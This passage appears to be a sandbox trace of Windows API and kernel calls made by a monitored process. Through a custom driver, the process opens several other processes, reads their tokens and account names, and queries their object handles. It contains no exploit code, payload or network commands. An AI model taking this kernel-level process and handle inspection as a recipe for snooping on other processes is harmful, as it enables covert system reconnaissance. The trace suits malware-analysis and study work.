(in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003247060, HandleInformation=0x0) returned 0x0 [0227.405] ObOpenObjectByPointer (in: Object=0xfffffa8003247060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.405] ObfDereferenceObject (Object=0xfffffa8003247060) returned 0x1c [0227.405] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 [0227.405] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.405] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.405] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.405] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.408] CloseHandle (hObject=0xc4) returned 1 [0227.408] CloseHandle (hObject=0xc8) returned 1 [0227.408] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.408] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0227.408] PsLookupProcessByProcessId (in: ProcessId=0x3f8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.408] PsAcquireProcessExitSynchronization () returned 0x0 [0227.408] KeStackAttachProcess (in: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0) [0227.408] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003184070, HandleInformation=0x0) returned 0x0 [0227.409] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.409] PsReleaseProcessExitSynchronization () returned 0x2 [0227.409] ObfDereferenceObject (Object=0xfffffa8003247060) returned 0x1a [0227.409] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.409] ObfDereferenceObject (Object=0xfffffa8003184070) returned 0x1 [0227.409] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.409] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.409] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.409] PsLookupProcessByProcessId (in: ProcessId=0x3f8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.409] PsAcquireProcessExitSynchronization () returned 0x0 [0227.409] KeStackAttachProcess (in: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0) [0227.409] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003184460, HandleInformation=0x0) returned 0x0 [0227.409] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.409] PsReleaseProcessExitSynchronization () returned 0x2 [0227.409] ObfDereferenceObject (Object=0xfffffa8003247060) returned 0x1a [0227.409] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.409] ObfDereferenceObject (Object=0xfffffa8003184460) returned 0x1 [0227.409] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.409] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.409] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0227.409] PsLookupProcessByProcessId (in: ProcessId=0x3f8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.409] PsAcquireProcessExitSynchronization () returned 0x0 [0227.409] KeStackAttachProcess (in: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0) [0227.409] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003193890, HandleInformation=0x0) returned 0x0 [0227.409] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.409] PsReleaseProcessExitSynchronization () returned 0x2 [0227.409] ObfDereferenceObject (Object=0xfffffa8003247060) returned 0x1a [0227.409] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.409] ObfDereferenceObject (Object=0xfffffa8003193890) returned 0x1 [0227.410] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.410] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.410] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0227.410] PsLookupProcessByProcessId (in: ProcessId=0x3f8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.410] PsAcquireProcessExitSynchronization () returned 0x0 [0227.410] KeStackAttachProcess (in: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003247060, ApcState=0xfffff880052b35d0) [0227.410] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80032516f0, HandleInformation=0x0) returned 0x0 [0227.410] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.410] PsReleaseProcessExitSynchronization () returned 0x2 [0227.410] ObfDereferenceObject (Object=0xfffffa8003247060) returned 0x1a [0227.410] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.410] ObfDereferenceObject (Object=0xfffffa80032516f0) returned 0x3 [0227.410] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.410] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e0) returned 0xc8 [0227.410] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.410] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003182060, HandleInformation=0x0) returned 0x0 [0227.410] ObOpenObjectByPointer (in: Object=0xfffffa8003182060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.410] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x23 [0227.410] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 [0227.410] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.410] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.410] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.410] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.412] CloseHandle (hObject=0xc4) returned 1 [0227.412] CloseHandle (hObject=0xc8) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.412] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.412] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.412] PsAcquireProcessExitSynchronization () returned 0x0 [0227.412] KeStackAttachProcess (in: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0) [0227.412] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800313d430, HandleInformation=0x0) returned 0x0 [0227.412] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.412] PsReleaseProcessExitSynchronization () returned 0x2 [0227.412] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x21 [0227.412] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.412] ObfDereferenceObject (Object=0xfffffa800313d430) returned 0x1 [0227.412] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.412] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.412] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0227.413] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.413] PsAcquireProcessExitSynchronization () returned 0x0 [0227.413] KeStackAttachProcess (in: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0) [0227.413] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80031939e0, HandleInformation=0x0) returned 0x0 [0227.413] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.413] PsReleaseProcessExitSynchronization () returned 0x2 [0227.413] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x21 [0227.413] ObQueryNameString (in: Object=0xfffffa80031939e0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.413] ObfDereferenceObject (Object=0xfffffa80031939e0) returned 0x1 [0227.413] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.413] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.413] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.413] PsAcquireProcessExitSynchronization () returned 0x0 [0227.413] KeStackAttachProcess (in: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0) [0227.413] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0227.413] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.413] PsReleaseProcessExitSynchronization () returned 0x2 [0227.413] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x21 [0227.413] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.413] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0227.413] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.413] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0227.413] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.413] PsAcquireProcessExitSynchronization () returned 0x0 [0227.413] KeStackAttachProcess (in: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0) [0227.414] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002fe5580, HandleInformation=0x0) returned 0x0 [0227.414] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.414] PsReleaseProcessExitSynchronization () returned 0x2 [0227.414] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x21 [0227.414] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.414] ObfDereferenceObject (Object=0xfffffa8002fe5580) returned 0x1 [0227.414] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.414] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.414] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.414] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.414] PsAcquireProcessExitSynchronization () returned 0x0 [0227.414] KeStackAttachProcess (in: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0) [0227.414] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001cc7af0, HandleInformation=0x0) returned 0x0 [0227.414] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.414] PsReleaseProcessExitSynchronization () returned 0x2 [0227.414] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x21 [0227.414] ObQueryNameString (in: Object=0xfffff8a001cc7af0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.414] ObfDereferenceObject (Object=0xfffff8a001cc7af0) returned 0x1 [0227.414] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.414] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.414] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0227.414] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.414] PsAcquireProcessExitSynchronization () returned 0x0 [0227.414] KeStackAttachProcess (in: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0) [0227.414] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80031723b0, HandleInformation=0x0) returned 0x0 [0227.465] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.465] PsReleaseProcessExitSynchronization () returned 0x2 [0227.465] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x21 [0227.465] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.465] ObfDereferenceObject (Object=0xfffffa80031723b0) returned 0x1 [0227.465] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.465] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.465] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.465] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.465] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.465] PsAcquireProcessExitSynchronization () returned 0x0 [0227.465] KeStackAttachProcess (in: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003182060, ApcState=0xfffff880052b35d0) [0227.465] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0227.465] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.465] PsReleaseProcessExitSynchronization () returned 0x2 [0227.465] ObfDereferenceObject (Object=0xfffffa8003182060) returned 0x21 [0227.465] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.465] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xf [0227.465] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.465] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa64) returned 0xc8 [0227.465] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.465] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800317b060, HandleInformation=0x0) returned 0x0 [0227.465] ObOpenObjectByPointer (in: Object=0xfffffa800317b060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.466] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x33 [0227.466] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8002195c80 | out: TokenHandle=0xfffffa8002195c80*=0xc4) returned 0x0 [0227.466] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.466] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.466] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.466] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.467] CloseHandle (hObject=0xc4) returned 1 [0227.467] CloseHandle (hObject=0xc8) returned 1 [0227.468] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.468] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.468] PsAcquireProcessExitSynchronization () returned 0x0 [0227.468] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0) [0227.468] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800318d860, HandleInformation=0x0) returned 0x0 [0227.468] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.468] PsReleaseProcessExitSynchronization () returned 0x2 [0227.468] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0227.468] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.468] ObfDereferenceObject 